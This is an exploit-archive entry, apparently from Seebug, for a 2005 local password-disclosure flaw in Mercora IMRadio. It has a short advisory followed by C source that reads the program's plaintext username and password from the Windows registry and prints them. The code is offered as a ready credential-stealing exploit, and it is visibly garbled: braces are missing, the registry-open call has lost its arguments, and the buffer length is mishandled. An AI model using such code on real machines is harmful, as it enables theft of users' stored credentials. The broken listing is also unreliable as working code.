Mercora IMRadio <= - Local Password Disclosure Exploit

ID SSV:63204
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


Mercora IMRadio password disclosure local exploit by Kozan

Discovered & Coded by: Kozan
Credits to ATmaCA

=====[ Application ]==============================================

Application: Mercora IMRadio (and probably prior versions)

=====[ Introduction ]=============================================

Search, listen, and record any music. With over 2.5 million unique
tracks, Mercora is a legal music radio network powered by people,
DJs, and artists just like you. Mercora combines Internet streaming,
country-specific copyright compliance, and social networking
technologies to create the next generation of digital music.
Version 4.0 supports friends and family listening, a vastly
simplified interface, customized listening, and live music search.

=====[ Bug ]======================================================

Mercora IMRadio stores username and passwords in the Windows
Registry in plain text. A local user can read the values.

Auto.Username = Mercora IMRadio Username
Auto.Password = Mercora IMRadio Password

=====[ Vendor Confirmed ]=========================================


=====[ Fix ]======================================================

There is no solution at the time of this entry.


#include <stdio.h>
#include <windows.h>
#define BUF 100

int main()
       HKEY hKey;
       char Username[BUF], Password[BUF];
       DWORD dwBUFLEN = BUF;
       LONG lRet;

       if( RegOpenKeyEx(HKEY_CURRENT_USER,
                                       ) == ERROR_SUCCESS )
               lRet = RegQueryValueEx(hKey, "Auto.Password", NULL, NULL, (LPBYTE)Password, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Password,"Not Found!");

               lRet = RegQueryValueEx(hKey, "Auto.Username", NULL, NULL, (LPBYTE)Username, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Username,"Not Found!");


               fprintf(stdout, "Mercora IMRadio password disclosure local exploit by Kozan\n");
               fprintf(stdout, "Credits to ATmaCA\n");
               fprintf(stdout, " \n");
               fprintf(stdout, "\n\n");
               fprintf(stdout, "Username :\t%s\n",Username);
               fprintf(stdout, "Password :\t%s\n",Password);
               fprintf(stderr, "Mercora IMRadio is not installed on your system!\n");

       return 0;

// [2005-08-22]